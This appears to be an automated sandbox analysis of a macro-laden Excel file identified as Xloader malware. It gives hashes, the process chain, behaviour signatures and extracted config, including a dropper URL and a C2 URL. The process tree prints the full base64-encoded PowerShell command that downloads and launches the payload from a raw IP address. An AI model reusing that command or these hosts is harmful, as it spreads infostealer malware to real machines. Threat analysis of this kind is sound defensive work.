Analysis

  • max time kernel
    151s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    17-11-2021 21:45

General

  • Target

    6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm

  • Size

    14KB

  • MD5

    70820ac2bb527bb0a10747a06d2c2b0b

  • SHA1

    7289b7ddcdcaa9450c27e1579f36d67a544cee80

  • SHA256

    6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753

  • SHA512

    64be67485be70ac5aa2539a88c9846282d7178e13a46895d4686ff0ce79378bf9ed4ee7bec00cb88abc0e2e8bb41a9b9ef38aa4ff25b4e4dc6334a96ad1ee4b5

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://84.252.122.205/xcx/system.exe

Extracted

Family

xloader

Version

2.5

Campaign

pufi

C2

http://www.homestechs.com/pufi/

Decoy

fusiongroupgames.net

hugevari.com

rebeccagriffiths.com

trocaoferta.com

theslashapp.com

codezonesoftware.xyz

sottocommunications.com

minicreators.online

course2millions.com

hfm5n1dhkjqwpe.xyz

xlab-ub.com

silvanaribeirocake.com

thefabinteriordesign.com

mg-leadership.com

petbort.com

ndust.net

203040302.xyz

jakital.com

shophuunghia.info

rednacionaldejuecesrd.net

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Xloader

    Xloader is a rebranded version of Formbook malware.

  • Xloader Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1248
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
      2⤵
      • Deletes itself
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Modifies registry class
      • NTFS ADS
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: RenamesItself
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1908
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c Cxrgbutjpc.bat
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:916
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBCAGUAeABzAGMAbwB5AGEAcABhAHIAYwB5AGgAbgBmAHkALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwA4ADQALgAyADUAMgAuADEAMgAyAC4AMgAwADUALwB4AGMAeAAvAHMAeQBzAHQAZQBtAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:552
          • C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe
            "C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1824
            • C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
              C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              PID:880
    • C:\Windows\SysWOW64\svchost.exe
      "C:\Windows\SysWOW64\svchost.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:964
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe"
        3⤵
          PID:1616

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
      MD5

      1784e74e8dd172731e715668f905639b

      SHA1

      8f180642955070583837e55fa3c5677c059a1e3c

      SHA256

      ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

      SHA512

      786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

    • C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
      MD5

      1784e74e8dd172731e715668f905639b

      SHA1

      8f180642955070583837e55fa3c5677c059a1e3c

      SHA256

      ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

      SHA512

      786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

    • C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe
      MD5

      1784e74e8dd172731e715668f905639b

      SHA1

      8f180642955070583837e55fa3c5677c059a1e3c

      SHA256

      ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

      SHA512

      786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

    • C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe
      MD5

      1784e74e8dd172731e715668f905639b

      SHA1

      8f180642955070583837e55fa3c5677c059a1e3c

      SHA256

      ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

      SHA512

      786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

    • C:\Users\Admin\Documents\Cxrgbutjpc.bat
      MD5

      31814477e987cc1e94638caa7f39f293

      SHA1

      c3814edcc331117303ced19f53006a4ecd09a833

      SHA256

      de24fa627ca42edfb1e5b46804f6dd0ed41fbcbd900eeeb56abc5cb34c1cadd4

      SHA512

      09a06a533d82dc086c345bd1c5ca92b2d582964c963b89e6e0c11c784effe9e4ecfc5e05f2bd3571437a04bead7c2d9fc053bd82538be17a23a473dc949fc268

    • \Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
      MD5

      1784e74e8dd172731e715668f905639b

      SHA1

      8f180642955070583837e55fa3c5677c059a1e3c

      SHA256

      ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

      SHA512

      786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

    • \Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe
      MD5

      1784e74e8dd172731e715668f905639b

      SHA1

      8f180642955070583837e55fa3c5677c059a1e3c

      SHA256

      ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f

      SHA512

      786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b

    • memory/552-60-0x0000000000000000-mapping.dmp
    • memory/552-61-0x0000000074F01000-0x0000000074F03000-memory.dmp
      Filesize

      8KB

    • memory/552-62-0x00000000024D0000-0x000000000311A000-memory.dmp
      Filesize

      12.3MB

    • memory/552-63-0x00000000024D0000-0x000000000311A000-memory.dmp
      Filesize

      12.3MB

    • memory/552-64-0x00000000024D0000-0x000000000311A000-memory.dmp
      Filesize

      12.3MB

    • memory/880-83-0x0000000000190000-0x00000000001A1000-memory.dmp
      Filesize

      68KB

    • memory/880-76-0x0000000000400000-0x0000000000429000-memory.dmp
      Filesize

      164KB

    • memory/880-82-0x0000000000A20000-0x0000000000D23000-memory.dmp
      Filesize

      3.0MB

    • memory/880-78-0x0000000000400000-0x0000000000429000-memory.dmp
      Filesize

      164KB

    • memory/880-79-0x000000000041D450-mapping.dmp
    • memory/880-77-0x0000000000400000-0x0000000000429000-memory.dmp
      Filesize

      164KB

    • memory/916-58-0x0000000000000000-mapping.dmp
    • memory/964-86-0x0000000000350000-0x0000000000358000-memory.dmp
      Filesize

      32KB

    • memory/964-85-0x0000000000000000-mapping.dmp
    • memory/964-91-0x0000000000570000-0x0000000000600000-memory.dmp
      Filesize

      576KB

    • memory/964-88-0x0000000000080000-0x00000000000A9000-memory.dmp
      Filesize

      164KB

    • memory/964-87-0x0000000000800000-0x0000000000B03000-memory.dmp
      Filesize

      3.0MB

    • memory/1248-84-0x0000000006BE0000-0x0000000006D72000-memory.dmp
      Filesize

      1.6MB

    • memory/1248-92-0x0000000009810000-0x000000000995E000-memory.dmp
      Filesize

      1.3MB

    • memory/1616-90-0x0000000000000000-mapping.dmp
    • memory/1824-69-0x0000000000B30000-0x0000000000B31000-memory.dmp
      Filesize

      4KB

    • memory/1824-74-0x0000000000690000-0x00000000006BA000-memory.dmp
      Filesize

      168KB

    • memory/1824-66-0x0000000000000000-mapping.dmp
    • memory/1824-71-0x0000000004B40000-0x0000000004B41000-memory.dmp
      Filesize

      4KB

    • memory/1824-72-0x0000000004AD0000-0x0000000004B32000-memory.dmp
      Filesize

      392KB

    • memory/1908-55-0x000000002FBF1000-0x000000002FBF4000-memory.dmp
      Filesize

      12KB

    • memory/1908-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1908-56-0x0000000070F51000-0x0000000070F53000-memory.dmp
      Filesize

      8KB